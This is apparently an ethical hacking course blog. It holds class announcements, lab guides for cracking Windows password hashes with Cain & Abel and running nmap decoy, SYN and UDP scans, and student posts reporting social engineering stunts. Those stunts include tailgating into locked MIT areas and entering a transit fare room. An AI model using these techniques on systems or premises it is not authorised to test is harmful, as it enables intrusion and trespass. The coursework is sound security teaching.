Essentially, only 'content owners' can post material; by 'content owners' they mean **AA, et al.

Much farther-reaching than the title of the bill lets on.  This could effectively outlaw software like VPN, TOR, etc.  This is scary; China is currently less restrictive.

It seems like if anyone disagrees with anything online, all they would need to do is post a link to torrents or warez on the blog/forum/site.

http://www.itworld.com/security/224681/sopa-sponsors-deride-criticisms-myths

There are many. many more links on this abomination.

Project 9: Windows Password Cracking with Cain and Abel

What You Need
A Windows XP machine with administrator access (real or virtual)

Creating Passwords to Crack
1.             Click Start, right-click My Computer, and click Manage.  In Computer Management, in the left pane, expand the Local Users and Groups container.
2.             In the left pane of Computer Management, click the Users container.  You should see some accounts in the right pane, as shown below on this page.

Creating Test Accounts
3.             In the left pane of Computer Management, right-click Users and click New User.
4.             In the NewUser box, enter user name of P3 and a password of abc, and click Create.  The check boxes in the lower section of the New User box don’t matter, because no one will really be using these accounts.
            P1        abcde
            P2        123
            P4        password

5.             Repeat the process to create the three accounts above.

Installing Cain
6.             On the virtual machine's desktop, open a browser and go to oxid.it
7.             In the upper left, click Projects.
8.             Scroll down past the disclaimer and click "Cain & Abel".
9.             Scroll down and click "Download Cain & Abel v4.9.25 for Windows NT/1000/XP".  (The version number may be higher now.)  Save the installer on your desktop.
10.         Double-click the installer.  Install the software with the default options.  It will install WinPCap as well as Cain & Abel.

Installing Abel
11.         Cain is the password cracker, and Abel is the process that harvests the hashed passwords from the Windows machine.  You normally install Abel on the target machine, but we'll just install it locally.
12.         Click Start, Programs, Accessories, Command Prompt.
13.         Type in the following command and press the Enter key:
copy \"program files"\cain\abel.exe \Windows
This command copies the Abel installer to the C:\Windows folder.
14.         Type in the following command and press the Enter key:
copy \"program files"\cain\abel.dll \Windows
This command copies the Abel DLL file to the C:\Windows folder.  This file is the actual service.
15.         Type in the following command and press the Enter key:
cd \Windows
This command changes the working directory to C:\Windows.
16.         Type in the following command and press the Enter key:
abel
This command installs the Abel service.  A box pops up saying "Abel service has been installed successfully!"  Click OK.
17.         Type in the following command and press the Enter key:
services.msc
18.         The Services window appears.  At the top of the right pane, right-click Abel and click Start.  In the top line of the right pane, you should see the Abel service with a Status of Started, as shown below on this page.

Finding your Computer's IP Address
19.         Click Start, Run.  Type in CMD and press Enter.  In the Command Prompt window, type IPCONFIG and press Enter.  Find your IP address.

Collecting Password Hashes With Cain
20.         Double-click the Cain icon on the desktop.  Click the Cracker tab.
21.         In the center of the window, right-click and click "Add to list". 
22.         In the "Add NT Hashes from" box, click Next.
   
Cracking Passwords
24.         In the right pane, right-click P3, point to "Brute-Force Attack", and click "NTLM Hashes", as shown below on this page.  Note: we are cracking the NTLM hashes, not the old, weak LM hashes.  The NTLM hashes are much more difficult to crack, so it will only work for short passwords.
25.         In the "Brute-Force Attack" box, click the Start button.  It should find the three-letter password immediately.  Close the "Brute-Force Attack" box.
26.         In the right pane, right-click P5, point to "Brute-Force Attack", and click "NTLM Hashes".
27.         In the "Brute-Force Attack" box, click the Start button.  It should find the five-letter password within a few seconds.  Close the "Brute-Force Attack" box.
28.         In the right pane, right-click P7, point to "Brute-Force Attack", and click "NTLM Hashes".
29.         In the "Brute-Force Attack" box, click the Start button.  The seven-letter password is hard to crack, however– no answer appears immediately.  It might take a long time to crack, so we'll give up.  Click the Stop button.  Click the Exit button.
30.         You should see the two passwords you found, abc and abcde, in the NT Password column of the Cain window.

Saving the Screen Image
31.         Press the PrntScn key to copy whole screen to the clipboard.  Open Paint and paste in the image.  Save it as a JPEG, with the filename Your Name Proj 9.

Turning in your Project
32.         Email the JPEG image to me as an attachment. 
33.         This is due Tuesday, November 29.

Chapter 7, 8, 9 and 10 Test

The test on these 4 chapters will be next Tuesday. November 22.  The content of the exam will be based on the concepts you presented in class this Thursday, November 17.  The exam will include a Hands-On component using the virtual environment similar to the homework exercises from the chapters.

Chapter 9 and 10 Homework

Chapter 9 and 10 Exercises from the book are due next Tuesday, November 22. 

On Thursday (11/17)

THE PLAN!

Comrade Crimson, Ms. Magenta, and Captain Seafoam Green will present on Chapter 7
Midnight Lover will present on chapter 8
General Angry Red and Professor Purple will present on chapter 9
Dr. Ultraviolet and Mustache Man will present on chapter 10.

You have 10-15 minutes PER CHAPTER to present. You are, effectively, teaching the chapter. Like professors, you need to choose what you think are the most important ideas in the chapter, and find an ENGAGING way to convey them to your classmates. DO NOT BE BORING. Also, make sure you choose not just the ideas you happen to find most interesting (alas, teaching isn't just about the stuff the teacher thinks is coolest), but the most FUNDAMENTAL ideas in the chapter.

(edited due to paranoia.)

Anyone hungry?

Food has been smuggled in. To get a full size box of cookies in, I placed in between two textbooks. (even though it was in a grocery bag I was not stopped at the gates).

Lock UN-picked

After many hours of frustration, I was unable to pick a Master lock (belonging to me).

It's the effort that counts.

http://packetstormsecurity.org/news/view/20175/US-Anti-Hacking-Law-Turns-Computer-Users-Into-Criminals.html

Payback's a BITCH

Angry Red, you were paid your due, but I sent a message to tag along. Task-get a note into your wallet. :)

TED Talk - Gaming/Problem Solving As Learning

http://www.ted.com/talks/jane_mcgonigal_gaming_can_make_a_better_world.html

Pics of Whiteboard from Discussion Last Week

Who has these?  Can you please create a unique post with them soon?  Thanks!!!

Backtrack Machine Character Repeat Fix Courtesy of Professor Jefferson Fernandez!

At the BT computer:
in the konsole shell before entering the GUI use the command:

xset r off

This will turn off the auto-repeat!!!!
then
startxto start the GUI

Thanks Professor Fernandez!

Chapter 8 Homework

Complete Exercises 8-1, 8-2, 8-3, 8-4, 8-5 from the textbook.  These are due next Tuesday, November 15.  Assignments 8-1 and 8-2 can be completed on any PC with Windows.  Assignments 8-3, 8-4, 8-5 must be completed in the virtual envirnoment.  Sumbit screenshots for credit!  Good luck!

this reminded me of our current chapter :)

I NEED POINTS!!

Ok, Ms Magenta has been trying to figure out what is wrong with his computer. It does seem to respond, the icons do not respond...oh dear...help help.

You have been trying to figure it out for the past week and still no luck. I have now spread my simple tactic to my computer and soon it will spread throughout the whole class until I get some points. Give me the points I so rightfully deserve which has baffled you for the past week!!

Cookie

Oh Dark one, here's a cookie for you.
Right in your bag where I talked Crimson into placing it :)
Smoochies,
M

General Angry Red and Mustache Man

We have both successfully blocked an evil and dire plot from Midnight Lover to break a dollar for him. The world is now safe due to the valiant and heroic efforts of General Angry Red and Mustache Man.

Hacktivism!

Your textbook focuses on one kind of "ethical hacking," hacking for hire, with permission from the company or organization that commissioned the hack. But there's another possible kind of ethical hacking. As we discussed last Thursday, some hackers use their powers--they think--for good. They attack sites with purposes that they deem morally wrong, such as child pornography sites. The Jester and Anonymous both do this sort of hacking, as do many other hackers. These hacks are not morally neutral; they are possessed of moral intention.

Find a news article, blog post, or other indication of a SPECIFIC hack with a moral intention. Post a comment on this post:
-linking to the news article/blog post/tweet/whatever
-explaining the hack (what did they do? when?)
-introducing the target (who did they hack?)
-excavating the moral intention (why did they hack it? Try to find communication *from* the hacker or hacker group saying why they did it; if not, try to speculate about their motives and come up with an argument for why it was legitimate for the hacker to hack this site.)

Email me if you have questions-- profpoole at gmail dot com. Please post this by Thursday at 9:00 AM. Yes, THIS THURSDAY, 11/10.

And the answer is....

The answer to the bonus question from the last test appears in Chapter 8!  Hmmm, interesting that I would ask a question that is later answered in your book.  Did anyone think to consult the book?  :)

Cake

Did I remember to upload this pic from my task of bringing in something for everyone to eat?
Here it is.
Magenta

Mail Call

[photo deleted]
Crimson, I said I'd watch your bag so I watched your computer at the sametime.
Oh this one was a pic of someone's email.
HUGS
Magenta

Little Red Soup Can

Oh mister dark one...
Could this be yours?
Shame my Magenta Rules sign didn't show.
This of course was a pic of one of the other game players cars with the license plate.
Ta ta love...

2600

http://www.2600.com

Good magazine, and website of interest. Check it out if you have not already.

And the Leader is....

Player	Points Earned This Week	Points Lost This Week	Total Points Earned
Captain Seafoam Green	10	0	10
Comrade Crimson	9	-2	7
Ms. Magenta	9	-4	5

Calc1 or was it Stats1

Who was I talking to one night after class about one of those classes, I have to register for next semester.

Arrgh! you salty sea biscuits

Avast! Cpt. Seafoam Green strikes again

Mission: attach a piece of ribbon to a landlubber key-chain.

Action taken:

I attached the ribbon to his key-chain which was attached to his belt loop. He didn't notice and

I even took a photo with the flash on which also went unnoticed . Not sure of his handle so i will call him mustache man.

See link for proof http://i.imgur.com/TDUQm.jpg

button button, who's got the button?

wow, a 2-fer day. Gotchya, Ultraviolet.

It's only pink, even though I'd rather it say "Don't Panic!!"

post-it punk'd

gotchya. :D


EDIT: Actually, I got TWO fellow players! The first was S (unsure of game-name). I'll reveal the second target only if it garners extra points :)...folks, be careful when I bait you. Playing/offering to be a target can be a ruse.

Love y'all!

BTW, I've been trying to be fair and not targeting anyone more than once. Just sayin'. :D

task - post it in someone's book, 1st page of chapter 7.

Logical Fallacies

http://www.logicalfallacies.info/

Access?

Mission: get access to someplace you are not supposed to be.

One of the T fare-collection stalls at Harvard Square was unlocked with an open door, so I just poked my head in briefly (sadly no photos, the Info kiosk had a direct sight line to the room and I didn't want to get caught exiting). The contents of the room looked to be a good deal of computer gear, probably the station camera feeds. I probably could have gotten further had I not been carrying a bunch of crap.

As such, I don't know if it warrants pointage, although I do have a few other targets in mind.

Paperclipped

Mission: put something harmless in a fellow player's pocket/bag. From two weeks ago, so I do not know if I still get the points.

I believe I managed to put a dog-bone paperclip into Midnight Lover's bag (it was then found and apparently removed as someone else found it on a keyboard).

Cloth for Magenta

Placed cloth in your wallet....time to cut up those credit cards :)

Harvard Hack

Please read the article in the link, along with looking into what Anonymous and the Jester have done as Hacktivists for the continuation of our discussion on Thursday. 
http://www.ethicsinbusiness.net/case-studies/hacking-into-harvard/

you've been FORKED

my challenge from last week...

You've been forked, O!!

<3

Yeah, you were right, I was up to no good :)

my task was to get a plastic fork into his bag.

The Game

So I hope everyone liked the food I smuggled into the lab since that was the challenge I drew.
If you want the recipes for any of the components of that dish let me know.
Till then ta my darlings,
Magenta

Chapter 7

Please read Chapter 7 and do Activities 7-2, 7-4, 7-5 for Tuesday, November 1.  Please email a screen shot or two for each one by Tuesday BEFORE class starts.

Access to a restricted area.

I originally posted this as a comment, so this is the cut and paste. I accomplished it immediately following last Thursdays class. My task was, basically, to gain access to a restricted area.

I immediately figured I would use the fact that all summer I have been a regular fixture at some of the the behavioral labs at MIT, taking part in various studies as a subject. The last one I did ended in September. I had no specific plan of where to end up. Yet, the door was locked today. I lurked a bit and was rewarded - out came an academic, and in I went. Nobody was in the locked lab. A janitor was wheeling down the hall, talking on the phone. I followed him through a locked door and....found myself in the basement! I wandered a bit. It went under several buildings. I passed a number of grad students walking through with data that they were pouring over, wearing badges, so I took out my badge holder (with my T pass and bank card and BHCC ID in it), and let it dangle from my necklace. Professor types passed me as well, and this time I was acknowledged - but not questioned. Various janitors walked past me. They even saw me taking pictures, but said nothing. I wandered into the front area of an occupied mail room, and snapped some pics (mind you, packages in reach that I could easily have taken or messed with if I had been malicious)...I wandered out to the shipping and receiving bay, and there was the ONLY place that I was stopped and sent back...I claimed I couldn't find the mailroom and was shown the way. I took pics of various piles of junk, like stripped computers, in a few side areas, and some creepy basement corners. Eventually I wandered out of a totally different building than I entered, apparently one of the clinical research areas. I also wandered out WITH someone...I had started a conversation with a random person walking by when it seemed I was spotted by security after all, about the book he was carrying (The Chomsky-Foucault Debate: On Human Nature, for the curious)...and made a show of gestures that might be mistaken for familiarity from a distance, and it worked. I walked out with the gentleman.

One thing that seemed very, very common - many, many people were on phones. Mostly using it visually - texts and data - only two people chatting (shipping dock guy and janitor). This made it VERY EASY to do this task.

here are the pictures! Nothing more than quick snaps, some are blurry, but you get the idea. :)

https://plus.google.com/photos/115946097789758291346/albums/5665928144813762033

Ultimate Failure

Ms. Magenta has caused a failure due to forgetfulness/laziness.

Midnight Lover you have successfully avoided an evil hyper complex and specific plot to give to you an item of sure death and destruction, AN M&M COOKIE GIVEN TO YOU BY SOMEONE OTHER THAN ME.

My first adventure

Ok ok so it was an easy one, all I had to do was to get someone to bring me a treat, something everyone should be doing anyways. Crimson was so sweet to smuggle some M&M's into the lab for me while one of the judges where watching and almost gave me away, shame on you! Although I didn't get much of the work done I told Crimson I was doing to get her to fetch and carry for me I was able to later chat up one of the labdrones and got the number 3 pc fixed a bit faster :)
That's all for me for today I still have papers to write, software to code, and maybe a cake to bake.
Ta Darlings!

Find out the name (first & last) of a person (fellow player) lives with.

Target: Ms Magenta
A**x Rock

The Game

What, no posts of hacks in the game?  Was everyone simply too busy to try to win hack points this weekend?  Don't forget your hacks expire at the beginning of class today and you will be able to select new ones. 

Magenta is now online

And I can post :)

The Game Begins!

And at this writing, still doesn't have a name.

But it has rules.

BT virutal

Anyone else getting a "500 processing error"?

The Game is a Foot...

Or it will be Thursday but we still need a name so post it here.

Chapter 6 Homework

Please complete all the exercises from the textbook from Chapter 6 and submit screen shots demonstrating the work by next Tuesday, October 25.  For most, if not all, of the exercises you will need to use the virtual environment to complete the work.  Make sure to schedule yourself a lab session and get to work!

Hacking and Voting Machines

http://www.thenewamerican.com/usnews/politics/9330-electronic-voting-machines-proven-vulnerable-to-hacking

A friend sent me this link. He threw this at me as an idea for a potential "group project" (I'm not sure in what manner this could be explored, exactly, but I'm intrigued), and to check out the embedded blue links in the texts. Also, he sent the fixed URL for the video link on the page that was broken -

http://www.youtube.com/embed/6ClrHPShljM

Security researcher sued for disclosing flaw

An interesting article I found about a security researcher in Australia who did find and disclose a vulnerability, but the company is claiming he ran afoul of a computer crimes act.

http://www.scmagazine.com.au/News/276780,security-researcher-threatened-with-vulnerability-repair-bill.aspx

Illustrates the need for security professionals to not only know their laws, but to ask before doing any testing and have a contract in writing.  Although I think the company should be grateful that he found it and not a malicious hacker...the actual 'test' didn't involve anything particularly complex.

Cell Phone Hack Technique

http://youtu.be/zaxYmm0XwTQ

a fairly simple way to bypass the need for passwords with some cell phone voicemail accounts.

...mostly, I posted this because this shows something fairly invasive and that might lead to more data. This can be done if anyone managed a simple social engineering feat that results in a phone number. I showed this video to a friend who was having a chuckle when I was telling her of our Social Engineering assignments, and she commented "Seriously, how much damage can be done if you just get a phone number? People give those out everyday."

Well, there you go.

SEAN? Anyone?

I'm missing something? Or do I have brain damage, or something... I'm still having issues with the assignments, I haven't gotten past the ping sweep! Sean, if you can give me that run through again? And checking one more time, in case I'm confused...these are done on the virtual environment, yes? Man, I am feeling a bit stupid here, but I'm not going to move along faster if I don't ask for help, so I am. I'm flailing. I keep getting this error, so I'm sure I'm messing up the IP range, syntax, SOMETHING.

Thanks. :/

Tuesday's challenges!

On Tuesday, I gave each one of you an individual social engineering challenge.

Post the results of your attempt to conquer your challenge here, by noon on Thursday!

Remember, you all also had to do the "Eight ball in the corner pocket" challenge of getting someone to go somewhere of your choice...i.e. to sit somewhere, or, in Orlando's modification, to park somewhere!

We'll talk about both in class on Thursday!

More social engineering fun (post-Thursday)

All right, team! I don't know what you've done yet in response to Tuesday's challenges, but here's something I want you to try.

Get someone you don't know to ASK, face to face (Karl..), for your phone number, email address, etc. Don't just give it to them outright, make them ask for it. You can make them work really hard for it if you want to, or you can give them a really lovely primrose path, (i.e. "We should stay in touch! ")

Everybody has to try. Who's going to be the first one to conquer this one? Comment!

Social Engineering tactics homework

1.

Eight ball in MY preferred corner pocket...too easy! Sat in the computer lab area outside our class, I was in between two empty seats, girl walks up and tried to sit to my right. I told her there was a virus on that PC, so she sat to my left.

2.

Construction going on around my building, I walked through my alleyway and noticed a construction truck with the driver parked on a private parking spot. I told him that I owned the spot (which I don't) and kindly requested him to move. He agreed and did so.

Hypnosis and Social Engineering

An interesting post I found just now on The Ethical Hacker Network (great website overall) about how hypnosis doesn't work as well for social engineering as one might be led to think.

http://www.ethicalhacker.net/content/view/366/24/

Eight Ball in the Corner Pocket

Right so done with that one :)

Project 8 - Decoy Scan

Decoy Scan Using nmap

Exercise 1: in this exercise, you’ll use nmap to perform a decoy scan, which mixes
your IP address with bogus IP addresses (using the -D option):

1. From a BackTrack shell, type the following (only type what's in bold, on one line):
user1@pentest:~#nmap -n -D192.168.1.5,10.5.1.2,me,172.1.2.4 target_IP_address > /root/ceh/decoy_scan

Syntax breakdown:
nmap: program name
-n: program option to never resolve DNS names
-D192.168.1.5,10.5.1.2,me,172.1.2.4: program option to cloak your scan with the supplied bogus and real IP addresses target_IP_address: the IP address of the target system
> /root/ceh/decoy_scan: redirect the output to a file called decoy_scan in the /root/ceh directory

2. Examine your results:
user1@pentest:~#cat /root/ceh/decoy_scan | less


3.  Email your results to proflheureux@gmail.com.

Project 7 - Port Scanning Using TCP

TCP SYN Scan Using nmap

Let's build on this common port scan so that your actions are stealthier.


In the next example, you will add two additional options: the -g and the –p options:
The -g option specifies the source port on the scanning machine (your system).
The most common option to use here is port 80 (because it's allowed through most
border network devices). The -p option sets the ports on the target system to scan.


Exercise 1: TCP SYN scan:


1. Using the -sS flag option, you will send the target system a SYN packet, but upon receiving the SYN/ACK from the target system, your system will not respond with an ACK packet (thus, completing the 3-way handshake). Instead, your system will respond with a RST packet (the port is then considered open). If you receive an RST/ACK packet from the target system, it indicates that there is not a running process on that port, or the process running on the port is not listening for connections.

2. The syntax to perform a TCP SYN scan is (only type what's in bold, on one line):
user1@pentest:~#nmap -sS -vv -g 80 -p 80,88,135,139,389,445 target_IP_address > /root/ceh/syn_scan

Syntax breakdown:
nmap: program name
-sS: program option for TCP SYN scan
-vv: program option for double verbose output
-g 80: program option that specifies the source port on the scanning machine
(your system)
-p 80,88,135,139,389,445: specifies the ports on the target system to scan
target_IP_address: the IP address of the target system
> /root/ceh/syn_scan: redirect the output to a file called syn_scan in the /root/ceh directory


3. Examine your results:
user1@pentest:~#cat /root/ceh/syn_scan | less

4. Record your results:  PORT STATE SERVICE


5. Repeat steps #2-3 using a different target IP address and different destination port numbers


6.  Email your results to proflheureux@gmail.com.

Project 6 - Port Scanning Using UDP

UDP Scan Using nmap

In this lab, you will use the nmap -sU option to perform a UDP scan.


With this scan type, nmap sends 0-byte UDP packets to each port on the target system. Receipt of an ICMPv4 Destination Unreachable/Port Unreachable (Type 3, Code 3) message signifies the port is closed; otherwise it is assumed open.


One major problem with this technique is that when a firewall blocks outgoing ICMPv4 Type 3, Code 3 messages, the port will appear open. These false-positives are hard to distinguish from real open ports.


Another disadvantage with UDP scanning is the speed at which it can be performed. Most OSes limit the number of ICMPv4 Type 3, Code 3 messages which can be generated in a certain time period, thus slowing the speed of a UDP scan. nmap adjusts its scan speed accordingly to avoid flooding a network with useless packets.


NOTE: Microsoft OSes do not limit the ICMPv4 Type 3, Code 3 error generation frequency, thus, making it is easier to scan a Windows machine's 65,535 UDP ports in very little time.

Exercise 1:

1. From a BackTrack shell, type the following (only type what's in bold):
user1@pentest:~# nmap -sU -v target_IP_address > /root/ceh/udpscan
Syntax breakdown:
nmap: program name
-sU: program option for UDP scan
-v: verbose mode
target_IP_address: the IP address of the target system
> /root/ceh/udpscan: redirect the output to a file called udpscan in the /root/ceh directory


2. Examine your results:
user1@pentest:~#cat /root/ceh/udpscan | less


3. Repeat steps #1-2 using different target IP addresses. Compare your results.


4.  Email your results to proflheureux@gmail.com.